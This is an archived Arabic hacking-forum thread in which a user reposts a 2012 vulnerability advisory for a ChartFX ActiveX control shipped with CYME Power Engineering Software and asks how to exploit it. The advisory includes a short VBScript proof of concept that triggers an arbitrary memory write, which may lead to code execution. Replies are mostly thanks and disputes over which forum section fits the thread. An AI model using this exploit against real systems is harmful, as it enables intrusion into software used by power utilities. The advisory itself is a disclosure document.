المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة جديدة تاريح الثغرة 4/10/2012



santos7x7x
10-05-2012, 03:31 PM
شباب بدى تفسير كيفية استغلال هاى الثغرة وللعم هى تاريخها 4/10/2012
__________________________________________________ __________________________________


Application: CYME Power Engineering Software

Platforms: Windows
Version: CYME version 5.0.12.663.

Secunia: SA48430

{PRL}: 2012-29

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com/

Twitter: @ProtekResearch


################################################## ###################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


################################################## ###################################

===============
1) Introduction
===============

The CYME Power Engineering software is a suite of applications composed of a network editor, analysis
modules and user-customizable model libraries from which you can choose to get the most powerful solution.

The modules available comprise a variety of advanced applications and extensive libraries for either
transmission/industrial or distribution power network analysis.

(http://www.cyme.com/software/)

This software is use by all major electrical production/distrubtion company
http://www.cyme.com/company/clients/

################################################## ###################################

============================
2) Report Timeline
============================

2012-03-14 Vulnerability reported to Secunia
2012-10-03 Publication of this advisory (180 Days)


################################################## ###################################

============================
3) Technical details
============================
The vulnerability is caused due to an indexing error in the "ShowPropertiesDialog()"
method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be
exploited to write a single byte value to an arbitrary memory location via the
"pageNumber" parameter. Successful exploitation may allow execution of arbitrary code.


################################################## ###################################

===========
4) The Code
===========
<object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' />
<script language='vbscript'>
targetFile = "C:\CYME\CYMDIST50TRIAL\ChartFX.ClientServer.Core.d ll"
prototype = "Sub ShowPropertiesDialog ( ByVal context As Variant , ByVal pageNumber As Long )"
memberName = "ShowPropertiesDialog"
progid = "Cfx62ClientServer.Chart"
argCount = 2

arg1="defaultV"
arg2=2147483647

target.ShowPropertiesDialog arg1 ,arg2
http://im30.gulfup.com/nXfo2.jpg

Sålðe Åddîçt Håhér
10-05-2012, 03:57 PM
بارك الله فيك..

يحيي الصدامي
10-05-2012, 08:28 PM
كفوؤو يالغالي بس آنت حاطط الموضوع بالقسم الخطأ مفروض كنت تحطه بقسم الثغرآت

QtRoNiX FoX
10-06-2012, 04:38 PM
ينقل للقسم المناسب

بالتوفيق

santos7x7x
10-07-2012, 11:31 AM
على اساس ان دة قسم اية مثلا؟ مهو دة قسم الثغرات
ههههههههه ممكن يكون قصدك احطو فى قسم المشاكل ممكن

jok17
10-07-2012, 03:52 PM
بارك الله فيك

سارة الغامدي
10-11-2012, 03:15 AM
مشكؤؤؤر .. يعطيك العافية .. دمت بتالق

يحيي الصدامي
10-12-2012, 04:09 PM
لا يالغالي انت كنت حاطه في قسم اختراق المواقع مو قسم الثغرات

الامير2
10-16-2012, 02:41 PM
الموضوع ما يفتح معي ؟ساعدوني